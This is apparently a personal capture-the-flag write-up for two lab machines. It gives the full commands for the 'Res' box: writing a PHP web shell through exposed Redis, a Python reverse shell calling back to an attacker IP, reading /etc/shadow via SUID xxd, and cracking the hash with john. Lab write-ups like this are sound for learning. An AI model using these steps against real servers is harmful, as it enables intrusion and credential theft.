Watcher

I did watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account then include it for RCE, then a few different things to move between users but nothing exciting.

Res

Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

This was a redis box, pretty simple. I mostly want to record the RCE step, which wasn’t guided. I followed this like so, with telnet:

┌──(root💀kali)-[/opt/thm/res]
└─# telnet 10.10.1.20 6379
Trying 10.10.1.20...
Connected to 10.10.1.20.
Escape character is '^]'.
INFO
$3677
# Server
redis_version:6.0.7
# etc
config set dir /var/www/html 
+OK
config set dbfilename cmd.php
+OK
set test "<?php system($_GET['cmd']);?>"
+OK
save
+OK

Then:

http://10.10.1.20/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.9.10.123%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Using the python reverse shell. Privesc was via the SUID bit on XXD to read /etc/shadow and break a password for our user from the sudoers group:

www-data@ubuntu:/dev/shm$ LFILE=/etc/shadow 
LFILE=/etc/shadow
www-data@ubuntu:/dev/shm$ xxd "$LFILE" | xxd -r
xxd "$LFILE" | xxd -r
#etc
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

Which then was:

┌──(root💀kali)-[/opt/thm/res]
└─# john hash -w=/usr/share/wordlists/rockyou.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beautiful1       (?)
1g 0:00:00:00 DONE (2021-02-19 03:58) 1.754g/s 2245p/s 2245c/s 2245C/s kucing..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Anyway the redis part was relevant.